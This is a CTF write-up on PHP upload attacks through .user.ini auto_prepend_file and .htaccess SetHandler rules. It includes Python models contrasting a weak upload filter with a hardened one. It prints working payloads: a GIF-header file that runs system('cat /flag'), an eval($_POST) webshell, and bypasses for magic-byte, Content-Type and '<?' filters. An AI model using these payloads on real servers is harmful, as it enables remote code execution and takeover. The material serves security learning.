File upload vulnerability (.user.ini and .htaccess)
One, .user.ini
.user.ini is essentially a per-directory php.ini that the user of a site can supply. Only settings whose mode is PHP_INI_PERDIR or PHP_INI_USER can be set in it; in practice that is every mode except PHP_INI_SYSTEM (PHP_INI_ALL included). Two caveats matter for exploitation: .user.ini is only honoured by the CGI/FastCGI SAPIs (php-fpm, which is what sits behind nginx), not by Apache's mod_php, and it is only read when PHP executes a script in that directory (or below it), so an upload directory that contains no .php file gives it nothing to act on.
Unlike php.ini, .user.ini is loaded dynamically: after modifying it there is no need to restart the web server; the change is picked up after at most user_ini.cache_ttl seconds (the default is 300).
With .user.ini we can easily build a "backdoor" through the auto_append_file and auto_prepend_file directives:
auto_prepend_file=01.gif
01.gif is the file that will be included before every script.
So .user.ini lets us make every PHP file in that directory "automatically" include a chosen file. That file can be a normal PHP file or a one-line webshell, and it does not need a .php extension, because it is pulled in by include rather than requested directly.
Example: [SUCTF 2019]CheckIn
1. Testing found:
The server is nginx, so PHP runs under php-fpm and .user.ini will be honoured.
The file content cannot contain <?
The upload is validated with PHP's exif_imagetype() function, which only sniffs the leading magic bytes, so prefixing the content with the GIF header GIF89a is enough to pass.
2. After reading up on .user.ini the approach is clear: upload a .user.ini like this:
GIF89a
auto_prepend_file=a.jpg
3. We also notice that an index.php already sits in the upload directory. An executable PHP file in that directory is exactly what .user.ini needs to take effect, so its presence gives away the intended test point (.user.ini) and confirms the idea should work.
Then upload a picture like this as a.jpg:
GIF89a
<script language='php'>system('cat /flag');</script>
The <script language='php'> tag gets around the <? filter, but note that this tag was removed in PHP 7.0; the bypass only works when the target runs PHP 5.x.
Finally, visit http://9f26d33b-a50f-44fd-8485-c2721470c2a1.node3.buuoj.cn/uploads/e2e7ec165ba05a5e1f3198caa7e22b54/index.php
and the flag is printed.
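To make the filter and its consequences concrete, here is an added Python model (not the challenge's code) of the checks a CheckIn-style upload handler applies, of what php-fpm does with the uploaded .user.ini, and of a hardened filter beside the weak one. The exact filter rules, the contents of index.php and the hardened variant are assumptions made for this example.

```python
import os
import re
import secrets

# Constructed model of the CheckIn-style upload filter described above. These checks
# are assumptions for the example, not the challenge's real source code.
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
}
EXT_FOR_KIND = {"gif": {"gif"}, "jpeg": {"jpg", "jpeg"}, "png": {"png"}}


def exif_imagetype(data: bytes):
    """Stand-in for PHP's exif_imagetype(): it only sniffs the leading magic bytes."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def vulnerable_check(name: str, data: bytes) -> bool:
    """Model of the challenge filter (assumed): the extension may not contain 'ph',
    the content may not contain '<?', and the magic bytes must look like an image."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if "ph" in ext:
        return False
    if b"<?" in data:
        return False
    return exif_imagetype(data) is not None


def prepend_chain(directory: dict, requested: str):
    """Model of php-fpm's per-directory .user.ini handling: when a .php script in the
    directory is executed, auto_prepend_file from .user.ini runs first. If no PHP
    script is executed there, .user.ini is never read and nothing happens."""
    if not requested.endswith(".php") or requested not in directory:
        return None
    chain = []
    for line in directory.get(".user.ini", b"").decode(errors="ignore").splitlines():
        m = re.match(r'\s*auto_prepend_file\s*=\s*"?([^"\s]+)', line)
        if m:
            chain.append(m.group(1))
    return chain + [requested]


def hardened_check(name: str, data: bytes):
    """Hardened filter: allowlist extensions, refuse dotfiles (.user.ini, .htaccess),
    require the magic bytes to agree with the extension, and let the server pick the
    stored name. Returns the stored name, or None when the upload is rejected."""
    base = os.path.basename(name)
    if base.startswith(".") or base.count(".") != 1:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    kind = exif_imagetype(data)
    if kind is None or ext not in EXT_FOR_KIND[kind]:
        return None
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed payloads taken from the walkthrough; index.php content is assumed.
USER_INI = b"GIF89a\nauto_prepend_file=a.jpg\n"
A_JPG = b"GIF89a\n<script language='php'>system('cat /flag');</script>\n"
UPLOAD_DIR = {"index.php": b"<?php echo 'hi';", ".user.ini": USER_INI, "a.jpg": A_JPG}

if __name__ == "__main__":
    for fname, payload in ((".user.ini", USER_INI), ("a.jpg", A_JPG)):
        print(fname, "passes weak filter:", vulnerable_check(fname, payload),
              "| hardened stores as:", hardened_check(fname, payload))
    print("executing index.php runs:", prepend_chain(UPLOAD_DIR, "index.php"))
```

Both payloads sail through the weak filter, and requesting index.php runs a.jpg first. The hardened check rejects .user.ini outright (dotfile, two dots) and rejects a.jpg because its GIF magic contradicts the .jpg extension; the same bytes uploaded as a.gif are still stored, which is why uploads should additionally live in a directory that contains no PHP script and where the web server never hands files to PHP.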
Two, .htaccess
1. .htaccess is generally used to leave a backdoor and to bypass an extension blacklist. It only works when Apache allows overrides for that directory (AllowOverride) and serves PHP through mod_php; otherwise the file is simply ignored. Write a text file named .htaccess containing
SetHandler application/x-httpd-php
and every file in that directory is parsed as PHP. To limit it to one extension use AddType instead, which requires an extension argument, e.g. AddType application/x-httpd-php .png
2. Leave the backdoor by adding a PHP parsing rule to .htaccess, for example treating any file whose name contains 1 as PHP:
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
With this, 12345.png is executed as PHP. FilesMatch takes an unanchored regular expression, so "1" matches anywhere in the name: 1.jpg, x1.gif and 12345.png all qualify.
Example: [GXYCTF2019]BabyUpload
1. File type bypass: the server only checks the request's Content-Type header, so set it to
Content-Type: image/jpeg
2. First upload a .htaccess file with the following content:
SetHandler application/x-httpd-php
3. The file name's suffix cannot start with ph, and the content is filtered for <?. Upload a picture horse like this:
GIF89a
<script language="php">eval($_POST['a']);</script>
4. Connect to the uploaded file with AntSword using the password a (again, the <script language="php"> tag only works on PHP 5.x).
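To see why 12345.png becomes executable and what each of the .htaccess fragments above actually covers, here is an added Python model (not Apache's code and not from the writeup) that parses the small subset of .htaccess used in this section and decides which handler a given filename would get. The precedence model is a deliberate simplification (last matching rule wins; real Apache gives SetHandler priority over AddType and merges sections in a defined order), and the fragments are constructed from the text.

```python
import re

# Constructed .htaccess fragments taken from the writeup above.
HTACCESS_ALL = "SetHandler application/x-httpd-php\n"
HTACCESS_FILESMATCH = '<FilesMatch "1">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'
HTACCESS_ADDTYPE = "AddType application/x-httpd-php .png\n"

PHP_HANDLER = "application/x-httpd-php"


def parse_htaccess(text: str):
    """Parse the subset of .htaccess used in these writeups: SetHandler and AddType at
    top level or inside <FilesMatch "regex">. Returns (regex, ext, handler) tuples where
    regex and ext are None when the rule is unconditional."""
    rules = []
    scope = None  # regex of the enclosing <FilesMatch>, if any
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r'<FilesMatch\s+"([^"]+)"\s*>', line, re.I)
        if m:
            scope = m.group(1)
            continue
        if re.match(r"</FilesMatch\s*>", line, re.I):
            scope = None
            continue
        m = re.match(r"SetHandler\s+(\S+)", line, re.I)
        if m:
            rules.append((scope, None, m.group(1)))
            continue
        m = re.match(r"AddType\s+(\S+)\s+(.+)", line, re.I)
        if m:
            for ext in m.group(2).split():
                rules.append((scope, ext.lstrip(".").lower(), m.group(1)))
    return rules


def handler_for(htaccess: str, filename: str) -> str:
    """Handler Apache would use for `filename` in a directory carrying this .htaccess.
    Simplified model (assumed): static file by default, last matching rule wins, and
    FilesMatch regexes are unanchored, as in Apache."""
    handler = "static"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    for regex, rule_ext, h in parse_htaccess(htaccess):
        if regex is not None and not re.search(regex, filename):
            continue
        if rule_ext is not None and rule_ext != ext:
            continue
        handler = h
    return handler


def executes_as_php(htaccess: str, filename: str) -> bool:
    return handler_for(htaccess, filename) == PHP_HANDLER


if __name__ == "__main__":
    cases = (("SetHandler", HTACCESS_ALL), ("FilesMatch 1", HTACCESS_FILESMATCH),
             ("AddType .png", HTACCESS_ADDTYPE))
    for label, ht in cases:
        for f in ("12345.png", "abc.png", "shell.jpg"):
            print(f"{label:13} {f:10} -> {handler_for(ht, f)}")
```

The bare SetHandler form catches every upload in the directory, the FilesMatch form catches anything with a 1 in its name, and the AddType form only the listed extension. On the defensive side the same model shows the fix: with AllowOverride None the directory's .htaccess is never parsed, so none of these rules apply regardless of what an attacker uploads.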